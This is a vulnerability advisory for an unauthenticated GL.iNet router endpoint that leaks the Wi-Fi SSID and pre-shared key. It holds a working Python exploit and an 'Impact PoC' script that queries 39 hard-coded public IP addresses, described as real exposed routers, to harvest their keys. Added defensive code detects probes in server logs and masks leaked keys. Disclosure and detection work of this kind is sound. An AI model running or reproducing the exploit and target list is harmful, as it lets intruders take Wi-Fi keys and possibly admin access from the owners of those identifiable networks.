CVE-2023-31478: CVE-issues/SSID_Key_Disclosure.md at main · gl-inet/CVE-issues

An issue was discovered on GL.iNet devices before 3.216. An API endpoint reveals information about the Wi-Fi configuration, including the SSID and key.


GL.iNET SSID Key Disclosure

  • CVSS Score - 8.3, High (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L)

  • Overview - An API endpoint present on all GL.iNET devices reveals information about the WiFi configuration, including the SSID and the pre-shared key. The endpoint can be called without any form of authentication (the 4.x firmware claims authentication is required for it). Affects versions <= 3.215; fixed in 3.216. Example request and response below:

    POST /api/router/mesh/status HTTP/1.1
    Host: 192.168.8.1
    Content-Type: application/x-www-form-urlencoded
    Connection: close
    Content-Length: 4

    mac=

    HTTP/1.1 200 OK
    Content-Type: application/json
    Content-Length: 143
    Connection: close
    Date: Thu, 29 Dec 2022 21:51:13 GMT
    Server: lighttpd/1.4.48

    {"del":"0","led":"1","led_sync":"0","wifi_sync":"0","ssid":"GL-XE300-343","key":"goodlife","encryption":"psk2","version":"3.214","code":0}

  • Description - The endpoint /api/router/mesh/status is not referenced by the front-end of the web GUI on any GL.iNET device; it is only reachable by calling the API directly.
  • Steps to reproduce - Run the Proof of Concept from the PoC section below with python3 exploit.py <domain/IP>, for example python3 exploit.py 192.168.8.1. On a vulnerable device the decoded reply is printed, such as {'del': '0', 'led': '1', 'led_sync': '0', 'disabled': '2G', 'wifi_sync': '0', 'ssid': 'GL-XE300-343', 'key': 'goodlife', 'encryption': 'psk2', 'version': '3.215', 'code': 0}
  • Impact
    • In the default configuration this issue is of limited use, so the impact needs spelling out. By default (on the device I examined), firewall rules block everything arriving on the WAN side, so the only way to reach the Web GUI is to already be on the LAN, in which case the SSID key is already known.
    • The issue does matter in non-standard configurations where the Web GUI is reachable without being on the LAN (for example when the WAN firewall has been opened). There, a remote attacker can read the key and use it to join the internal LAN.
    • In addition, the SSID key may be related to (or identical to) the admin password for the Web GUI. In that case a single unauthenticated request yields admin access to the router.
    • To illustrate these scenarios, I compiled a short list of publicly reachable GL.iNET Web GUIs that do not require LAN access; it is in the Impact PoC section. A Shodan search returns over 1000 results, of which 39 are included in the Python script. The majority of the listed IPs return the SSID key for their LAN to me. I did not test the admin-password overlap, for ethical reasons, but there is a high chance that at least some of those keys are related to, or the same as, the router's admin password.
    • This means that at least 1300 vulnerable GL.iNET routers are reachable by anyone on the Internet, with many more exposed in the other scenarios above.
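The following Python is an added example for this section, not code from the advisory or from GL.iNet: it classifies a captured reply from the endpoint by parsing the JSON, listing which Wi-Fi fields came back, checking the reported firmware version against the 3.216 fix threshold stated in the CVE text, and masking the PSK so the finding can be written up without the secret. The sample body is copied from the example response above; the function and constant names are my own, as is the assumption that a non-zero "code" or a non-JSON body means nothing was disclosed.

```python
import json
from typing import Any, Dict, Optional, Tuple

# Firmware version that fixed the issue (CVE text: everything "before 3.216" is affected).
FIXED_VERSION = (3, 216)
# Fields of the mesh/status reply that must not be readable without authentication.
SENSITIVE_FIELDS = ("ssid", "key", "encryption")

# Reply body copied from the advisory's example response above.
SAMPLE_RESPONSE = (
    b'{"del":"0","led":"1","led_sync":"0","wifi_sync":"0",'
    b'"ssid":"GL-XE300-343","key":"goodlife","encryption":"psk2",'
    b'"version":"3.214","code":0}'
)


def parse_version(version: str) -> Tuple[int, ...]:
    """Turn "3.215" or "4.1.0" into a comparable tuple; stops at the first non-numeric part."""
    parts = []
    for piece in version.strip().split("."):
        digits = "".join(ch for ch in piece if ch.isdigit())
        if not digits:
            break
        parts.append(int(digits))
    return tuple(parts)


def is_affected_version(version: str) -> bool:
    """True for firmware older than 3.216; 4.x sorts above the threshold and is out of range."""
    parsed = parse_version(version)
    return bool(parsed) and parsed < FIXED_VERSION


def assess_mesh_status(body: bytes) -> Optional[Dict[str, Any]]:
    """Classify a raw reply from POST /api/router/mesh/status.

    Returns None when the body is not the JSON object the vulnerable firmware sends
    (assumption: a login page or an error object with a non-zero "code" means
    nothing leaked); otherwise reports which sensitive fields came back and whether
    the reported version is inside the affected range.
    """
    try:
        doc = json.loads(body)
    except ValueError:
        return None
    if not isinstance(doc, dict) or doc.get("code") != 0:
        return None
    leaked = {k: doc[k] for k in SENSITIVE_FIELDS if doc.get(k) not in (None, "")}
    version = str(doc.get("version", ""))
    return {
        "version": version,
        "affected_version": is_affected_version(version),
        "leaked": leaked,
        "psk_disclosed": "key" in leaked,
    }


def masked_report(summary: Dict[str, Any]) -> str:
    """One-line finding with the PSK masked, so it can go into a ticket without the secret."""
    leaked = dict(summary["leaked"])
    if "key" in leaked:
        key = str(leaked["key"])
        leaked["key"] = key[0] + "*" * (len(key) - 1)
    state = "affected" if summary["affected_version"] else "out of affected range"
    return "firmware %s (%s): %s" % (summary["version"], state, leaked)


if __name__ == "__main__":
    result = assess_mesh_status(SAMPLE_RESPONSE)
    print(masked_report(result) if result else "no disclosure")
```

Feed `assess_mesh_status` the raw bytes of `response.content` from the PoC instead of printing `response.json()` directly; the version check is what separates a device that merely answers from one that is inside the affected range.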

PoC

```python
import sys
import warnings

import requests

# verify=False is needed because the device serves a self-signed certificate;
# silence the InsecureRequestWarning that requests emits for it.
warnings.filterwarnings("ignore")

## Get arguments
if len(sys.argv) < 2:
    print("Usage: python3 exploit.py <domain/IP>")
    sys.exit(1)

url = sys.argv[1]

## Send request
# The endpoint accepts an empty "mac" parameter and needs no session cookie or token.
data = "mac="
headers = {"Content-Type": "application/x-www-form-urlencoded"}
try:
    response = requests.request("POST", "https://" + url + "/api/router/mesh/status",
                                verify=False, timeout=4, data=data, headers=headers)
except requests.RequestException as err:
    print("[-] Request failed: %s" % err)
    sys.exit(1)

## Check response
# Vulnerable firmware answers with a JSON object containing "ssid" and "key";
# anything that does not decode as JSON is treated as not vulnerable.
try:
    print(response.json())
except ValueError:
    print("[-] Machine not vulnerable, error was encountered")
```

Impact PoC

```python
import sys
import warnings

import requests

# Silence the InsecureRequestWarning caused by verify=False (self-signed device certificates).
warnings.filterwarnings("ignore")

# Publicly reachable GL.iNET Web GUIs taken from Shodan (39 of the 1000+ results).
IPs = [
    "108.90.205.128", "109.90.119.187", "162.118.7.19:8443", "166.153.75.58",
    "173.72.170.60", "174.101.235.57", "185.62.151.240", "188.192.44.98",
    "194.37.97.59", "213.47.44.62", "216.162.194.32", "217.160.53.88",
    "37.80.213.8", "46.160.245.44", "50.28.223.226", "5.249.24.230",
    "60.241.22.108", "62.112.81.5", "63.46.29.137", "67.205.142.193",
    "68.160.163.70", "69.216.97.59", "72.250.53.61", "72.250.55.133",
    "74.72.184.86", "76.141.243.253", "76.84.210.156", "79.246.120.55",
    "80.151.80.107", "84.133.182.125", "84.141.234.241", "84.182.144.144",
    "89.238.176.15", "92.6.13.152", "93.46.98.210:8443", "94.79.171.10",
    "98.207.137.184", "99.226.73.153", "99.228.41.240:8443",
]

for ip in IPs:
    ## Send request
    data = "mac="
    headers = {"Content-Type": "application/x-www-form-urlencoded"}
    try:
        response = requests.request("POST", "https://" + ip + "/api/router/mesh/status",
                                    verify=False, timeout=4, data=data, headers=headers)
    except requests.RequestException as err:
        # An unreachable host must not abort the whole loop.
        print("[-] %s: request failed (%s)" % (ip, err))
        continue

    ## Check response
    try:
        print(ip, response.json())
    except ValueError:
        print("[-] %s: machine not vulnerable, error was encountered" % ip)
```
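The scan above shows what an attacker sees; the defender's question is whether a WAN-exposed device has already been probed. The following Python is an added example, my own code rather than the advisory's, that reads lighttpd-style access log lines, picks out requests to /api/router/mesh/status, and flags those from non-LAN addresses that received a 200 (on affected firmware, that is the reply carrying the SSID and PSK). The log layout is assumed to be lighttpd's default accesslog.format, the sample lines are constructed, and the LAN definition (RFC 1918 plus loopback, link-local and ULA ranges) is an assumption a deployment may need to adjust.

```python
import ipaddress
import re
from typing import Dict, Iterable, List

TARGET_PATH = "/api/router/mesh/status"

# Assumed log layout: lighttpd's default accesslog.format
#   "%h %V %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\""
LOG_RE = re.compile(
    r'^(?P<ip>\S+) (?P<vhost>\S+) (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Addresses treated as "on the LAN"; everything else is assumed to have arrived via the WAN.
LAN_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16",
    "fc00::/7", "fe80::/10", "::1/128",
)]

# Constructed sample log, not a real capture. Lines 1-3 hit the vulnerable endpoint:
# a LAN client, a WAN client that received the JSON (status 200), and a WAN client
# that was refused (the 401 is illustrative). Line 4 is an unrelated GUI request.
SAMPLE_LOG = """\
192.168.8.100 192.168.8.1 - [29/Dec/2022:21:51:13 +0000] "POST /api/router/mesh/status HTTP/1.1" 200 143 "-" "python-requests/2.28.1"
203.0.113.45 198.51.100.7 - [29/Dec/2022:22:03:41 +0000] "POST /api/router/mesh/status HTTP/1.1" 200 143 "-" "python-requests/2.28.1"
203.0.113.46 198.51.100.7 - [29/Dec/2022:22:04:02 +0000] "POST /api/router/mesh/status HTTP/1.1" 401 38 "-" "curl/7.81.0"
192.168.8.100 192.168.8.1 - [29/Dec/2022:22:05:10 +0000] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""


def is_lan_address(ip: str) -> bool:
    """True for RFC 1918, loopback, link-local and ULA addresses; False for anything else or junk."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return any(addr in net for net in LAN_NETS)


def find_mesh_status_probes(lines: Iterable[str]) -> List[Dict[str, object]]:
    """Return every request to the mesh/status endpoint with its source and outcome."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m.group("path").split("?", 1)[0] != TARGET_PATH:
            continue
        ip = m.group("ip")
        status = int(m.group("status"))
        hits.append({
            "ip": ip,
            "when": m.group("ts"),
            "method": m.group("method"),
            "status": status,
            "from_wan": not is_lan_address(ip),
            # On affected firmware a 200 on this path means the SSID and PSK went back.
            "disclosed": status == 200,
        })
    return hits


def wan_disclosures(lines: Iterable[str]) -> List[Dict[str, object]]:
    """The subset that matters: probes from outside the LAN that got the JSON back."""
    return [h for h in find_mesh_status_probes(lines) if h["from_wan"] and h["disclosed"]]


if __name__ == "__main__":
    for hit in wan_disclosures(SAMPLE_LOG.splitlines()):
        print("PSK disclosed to %s at %s" % (hit["ip"], hit["when"]))
```

Any entry returned by `wan_disclosures` is reason to rotate the Wi-Fi PSK (and the admin password, given the overlap discussed above), since the request needed no credentials and the key itself is what left the device.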
